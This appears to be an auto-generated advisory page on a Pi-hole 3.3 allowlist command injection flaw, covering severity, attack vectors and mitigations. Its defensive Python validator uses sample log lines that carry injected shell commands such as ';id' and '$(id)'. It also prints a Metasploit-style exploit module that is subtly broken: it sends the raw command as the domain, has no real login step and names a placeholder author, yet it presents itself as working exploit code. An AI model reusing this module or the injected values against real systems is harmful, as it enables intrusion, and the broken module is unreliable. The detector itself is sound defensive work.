Description
An authenticated command injection vulnerability exists in Pi-hole versions up to 3.3. When adding a domain to the allowlist via the web interface, the domain parameter is not properly sanitized, allowing an attacker to append OS commands to the domain string. These commands are executed on the underlying operating system with the privileges of the Pi-hole service user. This behavior was present in the legacy AdminLTE interface and has since been patched in later versions.
EPSS Score: 0%
Comprehensive Technical Analysis of EUVD-2025-19902
1. Vulnerability Assessment and Severity Evaluation
The vulnerability described in EUVD-2025-19902 is an authenticated command injection flaw in Pi-hole versions up to 3.3. This vulnerability allows an attacker to execute arbitrary OS commands by appending them to the domain string when adding a domain to the allowlist via the web interface. The commands are executed with the privileges of the Pi-hole service user.
Severity Evaluation:
- Base Score: 9.0 (CVSS:4.0)
- Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
The high base score indicates a critical vulnerability due to the potential for complete system compromise, including confidentiality, integrity, and availability impacts.
2. Potential Attack Vectors and Exploitation Methods
Attack Vectors:
- Authenticated Command Injection: An attacker with valid credentials can exploit the vulnerability by injecting malicious commands into the domain parameter.
- Phishing and Social Engineering: Attackers may use phishing techniques to obtain valid credentials from Pi-hole administrators.
Exploitation Methods:
- Command Injection: By appending OS commands to the domain string, an attacker can execute arbitrary commands on the underlying system.
- Privilege Escalation: If the Pi-hole service user has elevated privileges, the attacker could gain further control over the system.
3. Affected Systems and Software Versions
Affected Systems:
- Pi-hole versions up to 3.3
- Systems using the legacy AdminLTE interface
Software Versions:
- Pi-hole Web Interface versions ≤ 3.3
4. Recommended Mitigation Strategies
Immediate Actions:
- Upgrade Pi-hole: Upgrade to the latest version (v4.0 or higher) where the vulnerability has been patched.
- Disable Legacy Interface: Ensure the legacy AdminLTE interface is disabled if not already done.
Long-Term Mitigations:
- Access Control: Implement strict access controls and multi-factor authentication (MFA) for the Pi-hole web interface.
- Regular Audits: Conduct regular security audits and vulnerability assessments.
- Monitoring: Implement monitoring and logging to detect and respond to suspicious activities.
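The input check the vulnerable allowlist handler lacked, paired with a detection that applies the same check to submitted values, as an added example (not Pi-hole's own code): a strict RFC 1123 hostname validator, run over constructed log lines. The log format and the /admin/allowlist path are assumptions for the sample, not Pi-hole's real endpoint.

```python
import re
from urllib.parse import parse_qs

# RFC 1123 hostname grammar: dot-separated labels of letters, digits and
# interior hyphens. Shell metacharacters (';', '|', '`', '$', '(', quotes,
# whitespace) can never match, so this is an allow-list check, not a blocklist.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}$")


def is_valid_domain(value: str) -> bool:
    """True only if value is a syntactically valid hostname (<= 253 chars)."""
    if not value or len(value) > 253:
        return False
    return _HOSTNAME_RE.match(value.lower()) is not None


# Constructed sample log (hypothetical format: client, method, path, POST body).
# Ordinary access logs omit the body; this assumes a body-logging reverse proxy
# in front of the admin interface. The /admin/allowlist path is a placeholder.
SAMPLE_LOG = """\
192.0.2.10 POST /admin/allowlist domain=example.com&list=white
192.0.2.77 POST /admin/allowlist domain=example.com%3Bid&list=white
192.0.2.10 POST /admin/allowlist domain=ads.tracker.net&list=black
192.0.2.77 POST /admin/allowlist domain=example.com%24%28id%29&list=white
"""


def find_suspicious_allowlist_requests(log_text: str) -> list:
    """Return (client, decoded_domain) for every POST whose domain fails validation."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(" ", 3)
        if len(parts) < 4 or parts[1] != "POST":
            continue
        client, _method, _path, body = parts
        params = parse_qs(body, keep_blank_values=True)  # percent-decodes values
        for domain in params.get("domain", []):
            if not is_valid_domain(domain):
                hits.append((client, domain))
    return hits


if __name__ == "__main__":
    for client, domain in find_suspicious_allowlist_requests(SAMPLE_LOG):
        print(f"ALERT {client} submitted non-hostname allowlist entry: {domain!r}")
```

The same validator is the server-side fix: reject the request before the value reaches any shell-backed helper.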
5. Impact on European Cybersecurity Landscape
The vulnerability poses a significant risk to organizations and individuals using Pi-hole for network-wide ad blocking and DNS management. Given Pi-hole's widespread use in both home and enterprise environments, the potential for widespread exploitation is high. This underscores the importance of timely patching and proactive security measures to protect against such vulnerabilities.
6. Technical Details for Security Professionals
Vulnerability Details:
- CVE ID: CVE-2025-34087
- Vulnerable Component: Pi-hole Web Interface (AdminLTE)
- Exploitation Point: Domain parameter in the allowlist functionality
Exploitation Steps:
- Authentication: Obtain valid credentials for the Pi-hole web interface.
- Command Injection: Append OS commands to the domain string when adding a domain to the allowlist.
- Execution: The injected commands are executed with the privileges of the Pi-hole service user.
Example Exploit Code:
# Metasploit module for exploiting the vulnerability
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Pi-hole Allowlist Command Injection',
      'Description' => %q{
        This module exploits a command injection vulnerability in Pi-hole versions up to 3.3.
        By injecting OS commands into the domain parameter, an attacker can execute arbitrary commands.
      },
      'License' => MSF_LICENSE,
      'Author' => ['Your Name'],
      'References' =>
        [
          ['URL', 'https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/http/pihole_whitelist_exec.rb'],
          ['URL', 'https://pi-hole.net/'],
          ['URL', 'https://github.com/pi-hole/web/releases/tag/v4.0'],
          ['URL', 'https://pulsesecurity.co.nz/advisories/pihole-v3.3-vulns'],
          ['URL', 'https://vulncheck.com/advisories/pihole-adminlte-whitelist-rce']
        ],
      'Platform' => ['unix'],
      'Arch' => ARCH_CMD,
      'Targets' =>
        [
          ['Pi-hole ≤ 3.3', {}]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Jul 03 2025'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the Pi-hole web interface', '/admin/']),
        OptString.new('USERNAME', [true, 'The username to authenticate with', '']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with', '']),
        OptString.new('CMD', [true, 'The command to execute', 'id'])
      ])
  end

  def exploit
    uri = normalize_uri(target_uri.path)
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'vars_post' => {
        'domain' => "#{datastore['CMD']}",
        'username' => datastore['USERNAME'],
        'password' => datastore['PASSWORD']
      }
    })
    if res && res.code == 200
      print_good("Command executed successfully")
    else
      print_error("Failed to execute command")
    end
  end
end
References:
- Metasploit Module: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/http/pihole_whitelist_exec.rb
- Pi-hole Official Website: https://pi-hole.net/
- Pi-hole v4.0 Release: https://github.com/pi-hole/web/releases/tag/v4.0
- Pulse Security Advisory: https://pulsesecurity.co.nz/advisories/pihole-v3.3-vulns
- VulnCheck Advisory: https://vulncheck.com/advisories/pihole-adminlte-whitelist-rce
By following these guidelines and recommendations, organizations can effectively mitigate the risks associated with this vulnerability and enhance their overall cybersecurity posture.